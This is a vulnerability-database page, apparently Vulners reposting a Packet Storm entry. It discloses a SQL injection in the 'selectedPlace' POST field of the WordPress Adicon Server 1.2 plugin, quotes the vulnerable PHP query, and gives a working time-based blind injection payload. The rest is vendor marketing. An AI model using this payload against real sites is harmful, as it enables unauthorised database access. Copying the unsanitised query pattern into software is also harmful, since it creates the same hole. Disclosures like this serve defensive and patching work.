Lucene search
K

WordPress Adicon Server 1.2 SQL Injection

🗓️ 02 Jan 2019 00:00:00Reported by KaimiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

WordPress Plugin Adicon Server 1.2 SQL Injection vulnerabilit

Code
`# Exploit Title: WordPress Plugin Adicon Server 1.2 - 'selectedPlace' SQL Injection  
# Date: 2018-12-28  
# Software Link: https://wordpress.org/plugins/adicons/  
# Exploit Author: Kaimi  
# Website: https://kaimi.io  
# Version: 1.2  
# Category: webapps  
  
# SQL Injection  
# File: addIcon.php  
# Vulnerable code:  
# $placement=$_POST['selectedPlace'];  
  
# $x=explode("_",$placement);  
# $ck=$wpdb->get_row("select id from ".$table_prefix."adicons where adRow=".$x[0]." and adCol=".$x[1]);  
  
# Example payload:  
selectedPlace=1 AND (SELECT * FROM (SELECT(SLEEP(1)))abcD); -- -  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Jan 2019 00:00Current
0.3Low risk
Vulners AI Score0.3
20